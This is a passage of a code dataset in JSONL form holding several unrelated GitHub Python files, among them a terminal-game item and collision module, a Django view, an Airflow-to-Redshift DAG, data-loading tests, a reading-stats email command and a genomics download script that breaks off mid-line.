float(vX)\n\tbase[\"vY\"] = float(vY)\n\tbase[\"aX\"] = float(aX)\n\tbase[\"aY\"] = float(aY)\n\n\treturn base\n\n##########################\n#\n#\tProcedures\n#\n##########################\n\ndef assertItem(item):\n\tassert type(item) is dict\n\tfor i in range(0,len(attributesList)):\n\t\tassert attributesList[i] in item.keys(),\"\\\"Item\\\" type expect %r key.\"%attributesList[i]\n\n\treturn True #return true if \"item\" is a correct \"Item\"\n\ndef move(item,dt): #procedure to define new position of the item\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\n\tx = Object.getX(item) #get item X position\n\ty = Object.getY(item) #get item Y position\n\n\t#change item speed\n\titem[\"vX\"] += dt*item[\"aX\"]\n\titem[\"vY\"] += dt*item[\"aY\"]\n\n\tx+=dt*item[\"vX\"] #set possible future object position\n\ty+=dt*item[\"vY\"]\n\n\tObject.setX(item,x)#x changes\n\tObject.setY(item,y)#y changes\n\ndef tryCollide(item1,item2,coordinatesCheckOnly = False):\n\t\"\"\"\n\tIs 2 items colliding ?\n\t@param item1: Object of type \"Item\"\n\t@type item1: dict\n\n\t@param item2: Object of type \"Item\"\n\t@type item2: dict\n\n\t@param coordinatesCheckOnly: Should we only analyse coordinates ? (faster but less precise)\n\t@type coordinatesCheckOnly: bool\n\n\t@return: Are item1 and item2 colliding ? Yes:True No:False\n\t@rtype: bool\n\t\"\"\"\n\n\tassertItem(item1)\n\tassertItem(item2)\n\n\twidth1 = Object.getWidth(item1)\n\theight1 = Object.getHeight(item1)\n\tx1 = Object.getX(item1)\n\ty1 = Object.getY(item1)\n\n\twidth2 = Object.getWidth(item2)\n\theight2 = Object.getHeight(item2)\n\tx2 = Object.getX(item2)\n\ty2 = Object.getY(item2)\n\n\t\"\"\"tempList = [item1,item2]\n\n\tx1,y1 = int(round(Object.getX(item1))),int(round(Object.getY(item1)))\n\tx2,y2 = int(round(Object.getX(item2))),int(round(Object.getY(item2)))\n\n\tsmallerIndex = 0 if width1*height1 < width2*height2 else 1 #search which item is the smaller \"\"\"\n\n\tstartX1,startX2,startY1,startY2 = 0,0,0,0\n\tendX1,endX2,endY1,endY2 = 0,0,0,0\n\tforWidth,forHeight = 0,0\n\n\tif((x1+width1 < x2) or (x2+width2 < x1)): #if objects are not colliding on xS\n\t\treturn False\n\n\t#x tests\n\t#Tools.prDly(\"TESTS on X :\")\n\tif(x2 <= x1 and x2+width2 <= x1+width1): #if object potentially collide on x #CASE 1\n\t\tstartX1=0;startX2=int(round(x1-x2))\n\t\tendX2=width2-1;endX1=width2-startX2-1\n\t\tforWidth = endX2-startX2\n\t\t#Tools.prDly(\"Cas 1 :\\n\"+str(startX1)+\";\"+str(endX1)+\"\\n\"+str(startX2)+\";\"+str(endX2))\n\telif(x2 <= x1 and x2+width2 >= x1+width1): #CASE 2\n\t\tstartX1=0;startX2=int(round(x1-x2))\n\t\tendX1=width1-1;endX2=startX2+width1-1\n\t\tforWidth = width1-1\n\t\t#Tools.prDly(\"Cas 2 :\\n\"+str(startX1)+\";\"+str(endX1)+\"\\n\"+str(startX2)+\";\"+str(endX2))\n\telif(x2 >= x1 and x2+width2 >= x1+width1): #CASE 3\n\t\tstartX1=int(round(x2-x1));startX2=0\n\t\tendX1=width1-1;endX2=width1-startX1-1\n\t\tforWidth = endX1-startX1\n\t\t#Tools.prDly(\"Cas 3 :\\n\"+str(startX1)+\";\"+str(endX1)+\"\\n\"+str(startX2)+\";\"+str(endX2))\n\telif(x2 >= x1 and x2+width2 <= x1+width1): #CASE 4\n\t\tstartX2 = 0;endX2 = width2-1\n\t\tstartX1 = int(round(x2-x1));endX1 = startX1+width2-1\n\t\tforWidth = width2-1\n\t\t#Tools.prDly(\"Cas 4 :\\n\"+str(startX1)+\";\"+str(endX1)+\"\\n\"+str(startX2)+\";\"+str(endX2))\n\telse:\n\t\treturn False\n\n\n\t#y tests\n\t#Tools.prDly(\"TESTS on Y :\")\n\tif(y2 <= y1 and y2+height2 <= y1+height1): #if object potentially collide on x #CASE 1\n\t\tstartY1=0;startY2=int(round(y1-y2))\n\t\tendY2=height2-1;endY1=height2-startY2-1\n\t\tforHeight = endY2-startY2\n\t\t#Tools.prDly(\"Cas 1 :\\n\"+str(startY1)+\";\"+str(endY1)+\"\\n\"+str(startY2)+\";\"+str(endY2))\n\telif(y2 <= y1 and y2+height2 >= y1+height1): #CASE 2\n\t\tstartY1=0;startY2=int(round(y1-y2))\n\t\tendY1=height1-1;endY2=startY2+height1-1\n\t\tforHeight = height1-1\n\t\t#Tools.prDly(\"Cas 2 :\\n\"+str(startY1)+\";\"+str(endY1)+\"\\n\"+str(startY2)+\";\"+str(endY2))\n\telif(y2 >= y1 and y2+height2 >= y1+height1): #CASE 3\n\t\tstartY1=int(round(y2-y1));startY2=0\n\t\tendY1=height1-1;endY2=height1-startY1-1\n\t\tforHeight = endY1-startY1\n\t\t#Tools.prDly(\"Cas 3 :\\n\"+str(startY1)+\";\"+str(endY1)+\"\\n\"+str(startY2)+\";\"+str(endY2))\n\telif(y2 >= y1 and y2+height2 <= y1+height1): #CASE 4\n\t\tstartY2 = 0;endY2 = height2-1\n\t\tstartY1 = int(round(y2-y1));endY1 = startY1+height2-1\n\t\tforHeight = height2-1\n\t\t#Tools.prDly(\"Cas 4 :\\n\"+str(startY1)+\";\"+str(endY1)+\"\\n\"+str(startY2)+\";\"+str(endY2))\n\telse:\n\t\treturn False\n\n\tforWidth += 1 #correct the transition from coordinates to value\n\tforHeight += 1 #correct the transition from coordinates to value\n\t#Tools.prDly(\"\\n\\n\"+str(forWidth)+\";\"+str(forHeight))\n\n\tif(forWidth != 0 and forHeight != 0):\n\t\tif(coordinatesCheckOnly):\n\t\t\t#Tools.prDly(\"CHECK COO ONLY\")\n\t\t\treturn True\n\t\telse:\n\t\t\tfor i in range(0,forWidth):\n\t\t\t\tfor j in range(0,forHeight):\n\t\t\t\t\tdata1 = Object.getDataAt(item1,i+startX1,j+startY1)\n\t\t\t\t\tdata2 = Object.getDataAt(item2,i+startX2,j+startY2)\n\t\t\t\t\tif(data1 != '' and data1 != ' ' and data2 != '' and data2 != ' '):\n\t\t\t\t\t\treturn True\n\n\treturn False\n\n\n##########################\n#\n#\tGetters\n#\n##########################\n\n#----- Speed\n\ndef getVX(item): #get item x speed\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"vX\"]\n\ndef getVY(item): #get item y speed\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"vY\"]\n\n#----- Acceleration\n\ndef getAX(item): #get item x acceleration\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"aX\"]\n\ndef getAY(item): #get item y acceleration\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"aY\"]\n\n#----- Sprites\n\ndef getSprites(item): #get item list of sprites\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"sprites\"]\n\ndef getSpritesCount(item):\n\t\"\"\"\n\tGet \\\"item\\\" number of sprites\n\t@param item: object of type \\\"Item\\\"\n\t@type item: dict\n\n\t@return: \\\"item\\\" number of sprites\n\t@rtype: int\n\t\"\"\"\n\tassertItem(item)\n\n\treturn len(item[\"sprites\"])\n\ndef getSpriteAt(item,index): #get item sprite at index \"index\" in [\"sprites\"] list attribute\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(index) is int #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert index >=0 and index < len(item[\"sprites\"]),\"Index out of range. It have to be in [0;%r] and current try is : %r\" % (len(item[\"sprites\"]),index)\n\t\t #PERFORMANCE --> comment this line (upper) to increase performances (use carefully)\n\treturn item[\"sprites\"][index]\n\n#----- Size\n\ndef getBaseWidth(item):\n\t\"\"\"\n\t@param item: Dictionnary containing all information about one Item object\n\t@type item: dict\n\t@return: Return width of sprite[0] <=> width of base datas\n\t@rtype: int\n\t\"\"\"\n\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn len(item[\"sprites\"][0][0])\n\ndef getBaseHeight(item):\n\t\"\"\"\n\t@param item: Dictionnary containing all information about one Item object\n\t@type item: dict\n\t@return: Return height of sprite[0] <=> height of base datas\n\t@rtype: int\n\t\"\"\"\n\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn len(item[\"sprites\"][0])\n\n\n##########################\n#\n#\tSetters\n#\n##########################\n\n#----- Speed\n\ndef setVX(item,vX): #set item x speed\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(vX) is int or type(vX) is float #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"vX\"] = float(vX)\n\treturn 0\n\ndef setVY(item,vY): #set item y speed\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(vY) is int or type(vY) is float #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"vY\"] = float(vY)\n\treturn 0\n\n#----- Acceleration\n\ndef setAX(item,aX): #set item x acceleration\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(aX) is int or type(aX) is float #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"aX\"] = float(aX)\n\treturn 0\n\ndef setAY(item,aY): #set item y acceleration\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(aY) is int or type(aY) is float #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"aY\"] = float(aY)\n\treturn 0\n\n#----- Sprites\n\ndef addSprite(item,sprite): #add a sprite at the end of the sprite list\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tObject.assertDatas(sprite) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"sprites\"].append(sprite) #add sprite at the list\n\treturn 0\n\ndef removeSprite(item,index): #remove sprite designated in the list by index \"index\"\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(index) is int #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert index >=0 and index < len(item[\"sprites\"]),\"Index out of range. It have to be in [0;%r] and current try is : %r\" % (len(item[\"sprites\"]),index)\n\t\t #PERFORMANCE --> comment this line (upper) to increase performances (use carefully)\n\tdel item[\"sprites\"][index]\n\treturn 0\n\ndef setSprite(item,index): #set which sprite to be displayed on screen\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(index) is int #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert index >=0 and index < len(item[\"sprites\"]),\"Index out of range. It have to be in [0;%r] and current try is : %r\" % (len(item[\"sprites\"]),index)\n\t\t #PERFORMANCE --> comment this line (upper) to increase performances (use carefully)\n\tObject.setDatas(item,item[\"sprites\"][index])\n\treturn 0\n\n\n\n\n\n##########################\n#\n#\tinternal tests\n#\n##########################\n\nif(__name__ == \"__main__\"):\n\n\t#it = Item([[0,1,2,3,4,5],[1,0,0,0,0,1],[2,0,0,0,0,2],[3,0,0,0,0,3],[4,0,0,0,0,4],[5,0,0,0,0,5]],28,5,[255,255,255])\n\t#it = Item([[0,1,2,3,4,5]],28,5,[255,255,255])\n\t#it = Item([[0,'','','','',''],[1,0,'','','',''],[2,0,0,'2','',''],[3,0,0,0,'2',''],[4,0,0,0,0,'2'],[5,0,0,0,0,5]],28,5,[255,255,255])\n\n\t#it2 = Item([[0,1,2,3,4,5,6,7,8],[1,0,0,0,0,0,0,0,1],[2,0,0,0,0,0,0,0,2],[3,0,0,0,0,0,0,0,3]],29,4,[0,255,0])\n\t#it2 = Item([[0,1,2],[1,0,0]],30,8,[0,255,0])\n\t#it2 = Item([[0,1,2,3,4,5,6,7,8],['',0,0,0,0,0,0,0,1],['','',0,0,0,0,0,0,2],['','','',0,0,0,0,0,3]],28,4,[0,255,0])\n\n\tprint(\"Is it a correct Item type ? : \"+str(assertItem(it)))\n\tprint(\"x speed : \"+str(getVX(it)))\n\tprint(\"y speed : \"+str(getVY(it)))\n\tprint(\"x acceleration : \"+str(getAX(it)))\n\tprint(\"y acceleration : \"+str(getAY(it)))\n\tprint(\"Sprite 0 = \"+str(getSpriteAt(it,0))) #display base data\n\tmove(it,0.08)\n\tprint(\"\")\n\tprint(\"\")\n\tprint(\"x speed : \"+str(getVX(it)))\n\tprint(\"y speed : \"+str(getVY(it)))\n\tprint(\"x acceleration : \"+str(getAX(it)))\n\tprint(\"y acceleration : \"+str(getAY(it)))\n\tprint(\"Sprite 0 = \"+str(getSpriteAt(it,0))) #display base data\n\n\tTools.sysExec(\"clear\")\n\n\tObject.show(it)\n\tObject.show(it2)\n\tTools.goAt(1,1)\n\tprint(tryCollide(it,it2))","repo_name":"Cypher-0/projet-IPI","sub_path":"PyTry/Item.py","file_name":"Item.py","file_ext":"py","file_size_in_byte":12364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2877362977","text":"\"\"\"\nCP1404/CP5632 - Practical\nRandom word generator - based on format of words\nAnother way to get just consonants would be to use string.ascii_lowercase\n(all letters) and remove the vowels.\n\"\"\"\nimport random\n\nVOWELS = \"aeiou\"\nCONSONANTS = \"bcdfghjklmnpqrstvwxyz\"\n#word_format = input(\"Enter Word Format: \")\nsize = random.randint(1,10)\nrandlist=[]\nword_format = ''\nprint(size)\nfor i in range(size):\n option = random.randint(0,1)\n print(option)\n if(option == 0):\n randlist.append(random.choice(VOWELS))\n print(randlist)\n elif(option == 1):\n randlist.append(random.choice(CONSONANTS))\nword_format = word_format.join(randlist)\nword_format = word_format.lower()\nword = \"\"\nfor kind in word_format:\n if kind == \"#\":\n word += random.choice(VOWELS)\n elif kind == \"%\":\n word += random.choice(CONSONANTS)\n else:\n word += random.choice(VOWELS)\n\nprint(word)","repo_name":"vishmango117/CP1404-Practicals","sub_path":"Week 2/word_generator.py","file_name":"word_generator.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14101786102","text":"from django.shortcuts import render, redirect\nfrom .models import Query\n\n# Create your views here.\ndef home(request):\n\tif request.method == \"POST\" :\n\t\tname = request.POST.get(\"name\")\n\t\temail = request.POST.get(\"email\")\n\t\tsubject = request.POST.get(\"subject\")\n\t\tmessage = request.POST.get(\"message\")\n\n\t\tquery = Query(name = name, email = email, message = message, subject = subject)\n\t\tquery.save()\n\t\treturn redirect(\"/\")\n\telse:\n\t\treturn render(request, \"index.html\")\n","repo_name":"Abhaysaxena100/my_portfolio","sub_path":"formapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20190192154","text":"from datetime import datetime, date\nfrom decimal import Decimal\n\n\ndef standardize(val):\n if val is None:\n return None\n if isinstance(val, int):\n return str(val)\n if isinstance(val, str) or isinstance(val, unicode):\n return val.strip().lower()\n if isinstance(val, datetime):\n return val.strftime('%Y-%m-%d %H:%M:%S.%f')\n if isinstance(val, date):\n return val.strftime('%Y-%m-%d')\n if isinstance(val, Decimal) or isinstance(val, float):\n return str(round(val, 2))\n raise Exception('Couldn\\'t standardize \"%s\" (type %s)' % (val, type(val)))\n\n\ndef weekday_fields(val):\n \"\"\"\n Returns a 2-tuple containing:\n 1) The Python weekday value for the date passed (Monday == 0 ... Sunday == 6)\n 2) A boolean indicating whether the date is on the weekend (Saturday/Sunday)\n \"\"\"\n assert isinstance(val, datetime) or isinstance(val, date) # Actually a datetime is an instance of a date, so the first condition isn't necessary...\n return val.weekday(), val.weekday() in (5, 6)\n","repo_name":"mattklein/persfin","sub_path":"src/persfin/ml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42186416299","text":"import click\nimport rvo.db as db\nimport rvo.views as views\n\n@click.command(short_help=\"Show transactions\",\n help=\"\"\"\n Transactions are logged informations\n about changes and access to the documents.\n\n `log' is used to get those transactions listed.\n\n Having a hard time remembering what you did?\n \"\"\")\n@click.option('entries', '-e', '--entries', default=15, type=int,\n help='Number of entries being shown')\n@click.pass_context\ndef log(ctx, entries):\n \"\"\"\n Shows n latest transactions\n :n: int\n :returns: bool\n \"\"\"\n coll = db.get_transactions_collection(ctx)\n\n SUM = {}\n c = 0\n print(\"\")\n for doc in coll.find({}).sort(\"date\", -1).limit(entries):\n c += 1\n SUM[c] = doc\n\n views.transactions(SUM, c+1)\n\n return True\n\n","repo_name":"noqqe/rvo","sub_path":"rvo/commands/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"69"}
+{"seq_id":"71352442461","text":"import pytest\nimport tempfile\nimport os\nfrom tempfile import TemporaryDirectory\nfrom data import Dictionary, Corpus\nfrom batchifier import Batchifier\n\n\ndef dump_sample_sentences():\n sents = [\n 'The quick brown fox jumps over the lazy dog .',\n 'I ate the dinner .',\n 'I love learning .'\n ]\n n_tokens = 10\n\n tmpdir = TemporaryDirectory()\n with open(os.path.join(tmpdir.name, 'train.txt'), 'w', encoding='utf-8') as f:\n for sent in sents:\n f.write(sent+'\\n')\n\n return sents, n_tokens, tmpdir\n\n\ndef test_dictionary():\n d = Dictionary()\n assert d.special_tokens == [d.PAD, d.SOS, d.EOS, d.UNK]\n assert d.convert_token2idx('') == 0\n assert d.convert_token2idx('') == 1\n assert d.convert_token2idx('') == 2\n assert d.convert_token2idx('') == 3\n\n sentence = \"The quick brown fox jumps over the lazy dog\"\n sent_ids = [1, 4, 5, 6, 7, 8, 9, 10, 11, 12, 2]\n tokens = sentence.split(' ')\n for token in tokens:\n d.add_token(token)\n\n assert d.convert_tokens2idxs(tokens) == sent_ids\n assert ' '.join(d.convert_idxs2tokens_prettified(sent_ids)) == sentence\n\n\ndef test_corpus():\n sents, n_tokens, dir_ = dump_sample_sentences()\n tokens = [sent.split(' ') for sent in sents]\n corpus = Corpus(dir_.name, n_tokens)\n\n assert len(corpus.dictionary) == n_tokens\n assert corpus.maxlen == max(list(map(len, tokens)))+2 # +2 for , \n assert len(corpus.train) == len(sents)\n assert corpus.train[0][0] == corpus.dictionary.sos_idx\n assert corpus.train[0][-1] == corpus.dictionary.eos_idx\n assert corpus.test is None\n\n\ndef test_batchifier():\n sents, n_tokens, dir_ = dump_sample_sentences()\n tokens = [sent.split(' ') for sent in sents]\n corpus = Corpus(dir_.name, n_tokens)\n d = corpus.dictionary\n\n batchifier = Batchifier(corpus.train, d.pad_idx, batch_size=2)\n assert len(batchifier) == (len(sents) // 2)\n\n for src, tgt, lengths in batchifier:\n assert src[0][0] == d.sos_idx\n assert tgt[0][-1] == d.eos_idx\n assert ((src != d.pad_idx).long().sum(1) == lengths).all()\n assert ((tgt != d.pad_idx).long().sum(1) == lengths).all()\n\n","repo_name":"awant/arae","sub_path":"tests/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"24877799719","text":"def pokemonfun(numbers):\n\n pokemon = {\n 1: \"pokemon\",\n 2: \"picachu\",\n 3: \"sabasaur\"\n }\n for i in numbers:\n if pokemon.get(i) is None:\n print(\"pokemon not found\")\n else:\n print(pokemon[i])\n\n\nnumbers_list = [int(x) for x in input().split()]\n\nprint(numbers_list)\npokemonfun(numbers_list)\n","repo_name":"Darshna87/python_basics","sub_path":"python_basics_pokemon.py","file_name":"python_basics_pokemon.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32055408312","text":"from datetime import datetime, timedelta\n\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\n\nfrom load_to_redshift import LoadToRedshiftOperator\nfrom data_quality import DataCountCheckOperator, TripDateCheckOperator\n\n\ndefault_args = {\n 'owner': 'capstone',\n 'depends_on_past': False, # DAG does not have dependencies on past runs\n 'start_date': datetime(2021, 5, 12),\n 'retries': 3, # Task will be retried for 3 time in case of failure\n 'retry_delay': timedelta(minutes=5), # Interval between retries is 5 min\n 'catchup': False, # Only run latest\n 'email_on_retry': False # Do not email on retry\n}\n\ndag = DAG('capstone_pipeline',\n default_args=default_args,\n max_active_runs=1)\n\nS3_BUCKET = \"s3://dend-capstone-project-workspace/processed/\"\n\nload_trip_table = LoadToRedshiftOperator(\n task_id='load_trip_table_to_redshift',\n dag=dag,\n table=\"trip\",\n s3_path=S3_BUCKET + \"trip_data\"\n)\n\nload_station_table = LoadToRedshiftOperator(\n task_id='load_station_table_to_redshift',\n dag=dag,\n table=\"station\",\n s3_path=S3_BUCKET + \"station_data\"\n)\n\nload_covid_table = LoadToRedshiftOperator(\n task_id='load_covid_table_to_redshift',\n dag=dag,\n table=\"covid\",\n s3_path=S3_BUCKET + \"covid_data\"\n)\n\nload_weather_table = LoadToRedshiftOperator(\n task_id='load_weather_table_to_redshift',\n dag=dag,\n table=\"weather\",\n s3_path=S3_BUCKET + \"weather_data\"\n)\n\ndata_count_checks = DataCountCheckOperator(\n task_id='check_data_count',\n dag=dag,\n redshift_conn_id=\"redshift\",\n tables=['trip', 'station', 'covid', 'weather']\n)\n\ndate_checks = TripDateCheckOperator(\n task_id='check_trip_date',\n dag=dag,\n redshift_conn_id=\"redshift\"\n)\n\nfinish_load_operator = DummyOperator(task_id='finish_loading', dag=dag)\n\nend_operator = DummyOperator(task_id='stop_execution', dag=dag)\n\n[load_trip_table, load_station_table, load_covid_table, load_weather_table] \\\n >> finish_load_operator \\\n >> [data_count_checks, date_checks] \\\n >> end_operator\n","repo_name":"zhujun98/data-engineering","sub_path":"dend/dend_capstone_project/airflow/dags/capstone_pipeline.py","file_name":"capstone_pipeline.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"69"}
+{"seq_id":"22795502949","text":"from dataclasses import dataclass, astuple\nfrom typing import Tuple\n\nimport cv2\nimport numpy as np\n\nfrom primitives.color import Color\nfrom primitives.point import Point\n\n\n@dataclass\nclass Ellipse:\n color : Color\n position : Point\n axes : Tuple[ int, int ]\n angle : float\n\n\ndef draw_ellipse_on_image( ellipse : Ellipse, image : np.ndarray ) -> np.ndarray:\n image = cv2.ellipse(\n image,\n center = astuple( ellipse.position ),\n axes = ellipse.axes,\n angle = ellipse.angle,\n startAngle = 0,\n endAngle = 360,\n color = ellipse.color,\n thickness = cv2.FILLED,\n lineType = cv2.LINE_AA\n )\n return image\n","repo_name":"berryvansomeren/drarwing","sub_path":"primitives/ellipse.py","file_name":"ellipse.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23776371029","text":"from collections import defaultdict\nfrom datetime import date\nfrom decouple import config, Csv\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\nfrom django.db.models.functions import Lower\nfrom django.db.models import Q\nfrom django.utils import timezone\n\nfrom myreadinglist.mail import send_email\nfrom books.models import UserBook\nfrom goal.models import Goal, current_year\n\nPYBITES_EMAIL_GROUP = config('PYBITES_EMAIL_GROUP', cast=Csv())\nFRIDAY = 4\nONE_WEEK_AGO = timezone.now() - timezone.timedelta(days=7)\nCOMPLETED = 'c'\nSUBJECT = 'Weekly PyBites Books stats'\nMSG = \"\"\"\nUsage stats:\n- {num_total_users} total users ({num_new_users} new users joined last week).\n- {num_books_clicked} books were clicked.\n- {num_books_completed} books were completed (= {num_books_completed_pages} pages read).\n\nNew user profiles:\n{new_user_profiles}\n\nWhat books were completed last week? {books_completed}\n\nMost ambitious readers (# books to read goal this year):\n{goals}\n\nUpdate your reading here:\nhttps://pybitesbooks.com\n\"\"\"\nPROFILE_PAGE = settings.DOMAIN + \"/users/{username}\"\nTHIS_YEAR = current_year()\n\n\nclass Command(BaseCommand):\n help = 'email app stats'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--now',\n action='store_true',\n dest='now',\n help='flag to show stats now = bypass day of the week check',\n )\n\n def handle(self, *args, **options):\n run_now = options['now']\n\n # seems heroku does not support weekly cronjobs\n if not run_now and date.today().weekday() != FRIDAY:\n return\n\n all_users = User.objects.all()\n new_users = all_users.filter(\n date_joined__gte=ONE_WEEK_AGO)\n num_new_users = new_users.count()\n\n num_books_clicked = UserBook.objects.filter(\n inserted__gte=ONE_WEEK_AGO\n ).count()\n\n books_read_last_week = UserBook.objects.select_related(\n 'book', 'user'\n ).filter(\n Q(completed__gte=ONE_WEEK_AGO) & Q(status=COMPLETED)\n ).order_by(Lower('user__username'))\n\n num_books_completed = books_read_last_week.count()\n num_books_completed_pages = sum(\n int(ub.book.pages) for ub in books_read_last_week\n )\n new_user_profiles = ' '.join(\n (f\"- {uu.username} > \"\n f\"{PROFILE_PAGE.format(username=uu.username)}\")\n for uu in new_users\n )\n\n books_completed_per_user = defaultdict(list)\n for ub in books_read_last_week:\n books_completed_per_user[ub.user.username].append(ub.book)\n\n books_completed = []\n for username, user_books in books_completed_per_user.items():\n books_completed.append(f\" * {username}:\")\n books_completed.append(\n \"\".join(\n f' - {book.title} > {book.url}'\n for book in user_books\n )\n )\n\n goals = Goal.objects.filter(\n year=THIS_YEAR, number_books__gt=0\n ).order_by(\"-number_books\")\n goals_out = ' '.join(\n f'{goal.user.username} > {goal.number_books}'\n for goal in goals\n )\n\n msg = MSG.format(num_total_users=all_users.count(),\n num_new_users=num_new_users,\n new_user_profiles=new_user_profiles,\n num_books_clicked=num_books_clicked,\n num_books_completed=num_books_completed,\n num_books_completed_pages=num_books_completed_pages,\n books_completed=\"\".join(books_completed),\n goals=goals_out)\n\n for to_email in PYBITES_EMAIL_GROUP:\n send_email(to_email, SUBJECT, msg)\n","repo_name":"PyBites-Open-Source/pybitesbooks","sub_path":"myreadinglist/management/commands/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"23371472226","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nclass Animator(Gtk.DrawingArea):\n def __init__(self, **properties):\n super().__init__(**properties)\n self.set_size_request(200, 80)\n self.connect(\"draw\", self.do_drawing)\n GLib.timeout_add(50, self.tick)\n\n def tick(self):\n self.queue_draw()\n return True\n\n def do_drawing(self, widget, ctx):\n self.draw(ctx, self.get_allocated_width(), self.get_allocated_height())\n\n def draw(self, ctx, width, height):\n pass\n\nclass ListeningAnimator(Animator):\n def __init__(self, window, **properties):\n super().__init__(**properties)\n self.window = window\n self.tc = 0\n\n def draw(self, ctx, width, height):\n\n self.tc += 0.2\n self.tc %= 2 * math.pi\n\n for i in range(-4, 5):\n ctx.set_source_rgb(0.2, 0.5, 1)\n ctx.set_line_width(6)\n ctx.set_line_cap(cairo.LINE_CAP_ROUND)\n if i % 2 == 0:\n ctx.move_to(width / 2 + i * 10, height / 2 + 3 - \n 8 * math.sin(self.tc + i))\n ctx.line_to(width / 2 + i * 10, height / 2 - 3 + \n 8 * math.sin(self.tc + i))\n else:\n ctx.set_source_rgb(0.2, 0.7, 1)\n ctx.move_to(width / 2 + i * 10, height / 2 + 3 - \n 8 * math.cos(self.tc - i))\n ctx.line_to(width / 2 + i * 10, height / 2 - 3 + \n 8 * math.cos(self.tc - i))\n ctx.stroke()\n","repo_name":"1noro/fastmind","sub_path":"tests/pycairo/test4/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28029255775","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDownload fastq files from ENA.\n\"\"\"\n\nfrom sys import argv\nimport re\nimport os\n\nscript, first, second = argv\nworking_dir = first\ndata_file = second\n\n#dir = os.path.dirname(os.path.realpath(__file__))\n#data_file_full = os.path.join(dir,data_file)\ndata_file_full = data_file\n\nmaster_file = \"run_ENA_download_Py.sh\"\n\nfile_out = open(master_file, 'w')\nfile_out.write(\"#!/bin/sh\\n\")\nfile_out.write(\"cd \"+working_dir + \"\\n\")\n\t\t\nnum = 0\nrun_position = 0\nftp_position = 0\t\nwith open(data_file_full, 'r') as file_in:\t\n\tfor line in file_in.readlines():\n\t buffer = re.split(r'\\t', line.strip())\t \n\t num += 1\t \n\t if num == 1 :\n\t \tfor x in range(0,len(buffer)):\n\t \t\tif buffer[x] == 'run_accession' :\n\t \t\t\trun_position = x\n\t \t\tif buffer[x] == 'fastq_ftp' :\n\t \t\t\tftp_position = x\n\t else:\n\t \trun_id = buffer[run_position]\n\t \tftp_id_string = buffer[ftp_position]\n\t \t\n\t \tftp_ids = re.split(r'\\;', ftp_id_string)\n\t \tfq_num = 0 \n\t \tfor ftp_addr in ftp_ids :\n\t \t\tfq_num += 1\n\t \t\tsh_file = 'runPy_'+ str(num-1)+ '_'+ run_id+'_'+ str(fq_num) +'.sh'\n\t \t\t# master shell file\n\t \t\tfile_out.write('qsub -q copyq '+ sh_file + \" \\n\")\n\t \t\t\n\t \t\twith open(sh_file, 'w') as file_shell :\n\t \t\t\tfile_shell.write(\"#!/bin/sh\\n\")\n\t \t\t\tfile_shell.write(\"cd \"+ working_dir + \"\\n\")\n\t 